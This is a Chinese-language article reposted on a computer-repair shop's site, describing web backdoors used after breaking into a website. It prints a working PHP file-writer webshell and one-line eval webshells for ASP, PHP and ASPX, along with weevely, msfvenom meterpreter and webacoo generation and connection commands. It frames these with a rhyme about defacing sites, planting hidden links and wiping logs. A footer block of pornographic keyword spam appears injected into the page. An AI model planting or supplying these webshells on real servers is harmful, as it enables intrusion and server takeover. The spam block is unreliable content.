錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠服務技術文章
[安全]解析常見的Web后門應用方法

作者: 佚名  日期:2017-04-14 12:45:24   來源: 本站整理

 在對一個web站點進行滲透測試的滲透攻擊階段,一般會想辦法突破上傳限制,向目標可執(zhí)行目錄中寫入一個帶有攻擊性質的腳本來協(xié)助獲取更大的服務器權限。
這里我們就一起來盤點一下常用的web后門吧
大馬與小馬
在幾年前很流行的網(wǎng)站入侵打油詩中有寫
  進谷歌 找注入
  沒注入 就旁注
  沒旁注 用0day
  沒0day 猜目錄
  沒目錄 就嗅探
  爆賬戶 找后臺
  傳小馬 放大馬
  拿權限 掛頁面
  放暗鏈 清數(shù)據(jù)
  清日志 留后門
其中的傳小馬上大馬就是我們要說的小馬大馬了,小馬的功能一般都比較單一,作用一般是向服務器中寫入文件數(shù)據(jù)。因為其功能單一的特性,隱蔽性通常都比較高。有些網(wǎng)站對上傳文件大小做了限制,小馬因為占用空間也小也能繞過這些限制
這里貼一個php小馬
 
header("content-Type: text/html; charset=gb2312"); 
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); 
?> 
form method="POST"> 
保存文件名: input type="text" name="file" size="60" value=" echo str_replace('\\','/',__FILE__) ?>"> 
br>br> 
textarea name="text" COLS="70" ROWS="18" >textarea> 
br>br> 
input type="submit" name="submit" value="保存"> 
form> 
 
if(isset($_POST['file'])) 

$fp = @fopen($_POST['file'],'wb'); 
echo @fwrite($fp,$_POST['text']) ? '保存成功!' : '保存失敗!'; 
@fclose($fp); 

?>
大馬一般就提供了更多的功能,例如輔助提權,執(zhí)行sql語句,反彈shell等。
不過網(wǎng)上很多的大馬都加了后門,例如圖中的這款從mumaasp.com這個網(wǎng)站下載的一款大馬會將木馬的地址和密碼提交到http://www.mumaasp.com/xz/sx.asp這個網(wǎng)址

中國菜刀

中國菜刀和一句話木馬想必是大家最熟悉的了,中國菜刀支持asp、php、asp.net和jsp等web編程語言,小巧的中國菜刀還自帶了很多實用的功能。例如虛擬終端

還有例如安全掃描,定時鬧鐘,數(shù)據(jù)庫管理等功能,甚至內置了一個網(wǎng)頁瀏覽器
使用方法也很簡單,就是往目標web服務器上傳相應的一句話木馬
asp一句話木馬:
"pass"))%>
php一句話木馬:
 @eval($_POST[pass]);?>
aspx一句話木馬:
%@ Page Language="Jscript"%>
%eval(Request.Item["pass"])%>
網(wǎng)上也有很多仿冒中國菜刀的官網(wǎng)發(fā)布加了后門的中國菜刀
在linux下也有很多替代中國菜刀的開源產(chǎn)品,例如中國蟻劍和C刀
weevely
在kali linux中,我們用的比較多的就是這款php后門管理工具 weevely了。weevely支持的功能很強大,使用http頭進行指令傳輸。唯一的缺陷就是只支持php

我們通過幫助可以看到,weevely的使用還是很簡單的,首先我們在/root目錄下生成一個名為weevely.php密碼為123的backdoor agent
weevely generate 123 /root/weevely.php
然后我們只要上傳到目標服務器之后運行
weevely  就能成功連接上了

metasploit
metasploit框架中其實也自帶了php的后門,并且配合meterpreter功能強大
在這里提一下正向連接和反向連接(bind_tcp reverse_tcp)
bind_tcp:在這里黑客主動去連接目標主機,就叫作正向連接。適用的情況是服務器在外網(wǎng)的情況
reverse_tcp:在這個例子中反向連接就是被入侵的主機反過來來連接黑客,就叫作反向連接,在目標服務器在內網(wǎng)或有防火墻的情況下使用。
msfvenom -p php/meterpreter/bind_tcp lhost=172.24.3.20 lport=4444 -o /root/msf.php
其中l(wèi)host為目標服務器的地址 lport是目標服務器會開放的端口 -o后面是后門輸出的路徑
然后進入msfconsole

xu
選擇exploit/multi/handler這個模塊
然后設置payload為php/meterpreter/bind_tcp
最后設置一下目標的ip然后輸入run開始監(jiān)聽
觸發(fā)木馬的方法就是訪問后門的網(wǎng)址

然后msfconsole如果有連接信息說明已經(jīng)連接成功


使用方式可以參考meterpreter
參考鏈接](http://www.evil0x.com/posts/838.html
webacoo
webacoo是用base64編碼后隱藏在Cookie頭中,隱蔽性較強,webacoo的缺點是不能指定密碼,所以。。。不推薦作為持續(xù)性攻擊的權限維持的選擇
webacoo -g -o /root/webacoo.php
生成webacoo.php存放在/root目錄下

上傳成功之后用命令
webacoo -t -u 來連接

成功后會生成一個仿真終端,可以使用load命令來加載模塊,之后可以進行上傳下載,連接數(shù)據(jù)庫等操作。只是不能設置密碼是個硬傷。
 



熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯(lián)想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數(shù)和判...
  • IIS 8 開啟 GZIP壓縮來減少網(wǎng)絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數(shù)字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統(tǒng)快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯(lián)系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區(qū)域: 遼寧錦州市區(qū)
    主要業(yè)務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網(wǎng)設置,IT服務外包,局域網(wǎng)組建,ADSL共享上網(wǎng),路由器設置,數(shù)據(jù)恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    主站蜘蛛池模板: 老司机亚洲精品影院无码 | 99无码精品二区在线视频| 日韩精品无码免费专区午夜| 亚洲精品成人无码中文毛片不卡| av潮喷大喷水系列无码| 特黄熟妇丰满人妻无码| 久久男人Av资源网站无码软件| 亚洲精品无码激情AV| 久久青青草原亚洲av无码app| 夜夜精品无码一区二区三区| 99热门精品一区二区三区无码| 中文字幕人妻无码一区二区三区| 无码一区二区三区亚洲人妻| 91久久九九无码成人网站| 国产在线无码一区二区三区视频| 国产精品成人一区无码| 亚洲a∨无码一区二区| 久久国产亚洲精品无码| 久久久久亚洲av无码专区蜜芽| 人妻系列无码专区久久五月天| 亚洲AV无码资源在线观看| 亚洲VA中文字幕无码毛片| 超清无码无卡中文字幕| 国产精品成人99一区无码| 日韩AV无码不卡网站| 国产午夜无码视频免费网站| 国语成本人片免费av无码| 亚洲精品中文字幕无码AV| 少妇人妻无码专区视频| 亚洲A∨无码一区二区三区| 亚洲真人无码永久在线 | 久久亚洲精品AB无码播放| 亚洲综合无码精品一区二区三区 | 亚洲最大中文字幕无码网站| 日韩精品人妻系列无码专区| 亚洲精品无码MV在线观看| 国产精品无码无卡在线播放| 日韩精品中文字幕无码一区| 久久精品中文字幕无码绿巨人 | 国产成人无码一区二区在线观看 | 人妻AV中出无码内射|